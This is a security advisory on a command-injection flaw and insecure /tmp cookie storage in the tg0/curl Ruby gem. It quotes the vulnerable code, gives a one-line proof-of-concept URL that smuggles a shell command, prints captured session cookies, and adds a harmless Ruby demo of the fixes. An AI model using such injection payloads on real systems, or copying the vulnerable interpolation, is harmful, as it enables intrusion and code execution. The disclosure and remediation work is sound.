Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution. The URL handed to curl.get() is interpolated, unescaped, into a shell command string that open_pipe() then runs through the shell. A double quote inside the URL closes the quoted argument, and a ";" after it starts a second command, which executes with the privileges of the Ruby process (root in the PoC below).

In ./lib/curl.rb the following lines:

131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} #{ref} \"#{url}\" "
132 if @debug
133   puts cmd.red
134 end
135 result = open_pipe(cmd)

PoC (the injected command writes the output of id to /tmp/p):

page = curl.get("http://vapid.dhs.org/\"\;id>\/tmp\/p\;\"")

larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org

This gem also stores cookie data insecurely in /tmp. Cookie jars are written to the fixed, world-listable directory /tmp/curl (mode 0755) as world-readable files (mode 0644), so any local user can read every session cookie the gem has received, including ones the server flagged HttpOnly. The random numbers in the file names add nothing, since the directory can simply be listed:

root@underfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@underfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@underfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@underfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426199640	PREF	ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com	TRUE	/	FALSE	1378938840	NID	67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426198990	PREF	ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com	TRUE	/	FALSE	1378938190	NID	67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@underfl0w:/tmp#
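The following Ruby script is an added example, not code from the tg0/curl gem or from the advisory's author. It reproduces the two problems above side by side with their fixes: the string-interpolated shell command versus an argv array passed to a subprocess without a shell (plus a URL sanity check as defence in depth), and a world-readable cookie jar in /tmp/curl versus a 0600 jar inside a private 0700 directory. The payload URL is constructed to have the same shape as the PoC, with "echo INJECTED" standing in for "id>/tmp/p", and "echo" standing in for "curl", so the demo is harmless and runs offline. Function names, the PAYLOAD_URL constant and the "curl-cookies-" directory prefix are assumptions of this example.

```ruby
require 'open3'
require 'uri'
require 'tmpdir'

# Constructed payload in the shape of the advisory's PoC URL. The embedded
# double quote closes the quoted argument and ";" starts a second shell
# command; "echo INJECTED" stands in for "id>/tmp/p" so the demo is harmless.
PAYLOAD_URL = "http://vapid.dhs.org/\";echo INJECTED;\""

# Vulnerable shape (same construction as lib/curl.rb line 131, with "echo"
# standing in for "curl"): the URL is interpolated into one string that a
# shell will parse, so quotes and ";" in it are shell syntax, not data.
def vulnerable_command(url)
  "echo \"#{url}\""
end

# Run the string the way open_pipe does, i.e. through /bin/sh. Returns the
# stdout lines; one line per command the shell actually ran.
def run_vulnerable(url)
  out, _err, _status = Open3.capture3("sh", "-c", vulnerable_command(url))
  out.lines.map(&:chomp)
end

# Hardened shape: pass an argv array. With separate arguments Open3 (like
# Process.spawn) execs the program directly and never invokes a shell, so
# quotes and semicolons remain ordinary bytes of the single URL argument.
def run_hardened(url)
  out, _err, _status = Open3.capture3("echo", url)
  out.lines.map(&:chomp)
end

# Defence in depth: refuse anything that is not a syntactically valid
# http(s) URL before it gets near a subprocess. Ruby's RFC 3986 parser
# rejects the quote and the space in the payload outright.
def valid_http_url?(url)
  uri = URI.parse(url)
  uri.is_a?(URI::HTTP) && !uri.host.nil?
rescue URI::InvalidURIError
  false
end

# Cookie jar fix: instead of a 0644 file under the fixed, world-listable
# /tmp/curl, create a private 0700 directory with an unpredictable name and
# a 0600 jar inside it (O_EXCL so an existing file is never followed).
# Returns the jar path; the caller removes the directory when done.
def private_cookie_jar
  dir = Dir.mktmpdir("curl-cookies-")
  path = File.join(dir, "cookies.jar")
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0600) {}
  path
end

if $PROGRAM_NAME == __FILE__
  puts "shell string: #{run_vulnerable(PAYLOAD_URL).inspect}"
  puts "argv array:   #{run_hardened(PAYLOAD_URL).inspect}"
  puts "valid URL?    #{valid_http_url?(PAYLOAD_URL)}"
  jar = private_cookie_jar
  puts "cookie jar:   #{jar} mode #{'%o' % (File.stat(jar).mode & 0777)}"
  File.delete(jar)
  Dir.rmdir(File.dirname(jar))
end
```

Run stand-alone, the shell-string variant prints two lines (the URL, then INJECTED, because the shell ran two commands), while the argv variant prints the payload back as a single literal line. The argv fix is the one that matters; the URI check only narrows what reaches the subprocess and would not by itself be a safe substitute for avoiding the shell.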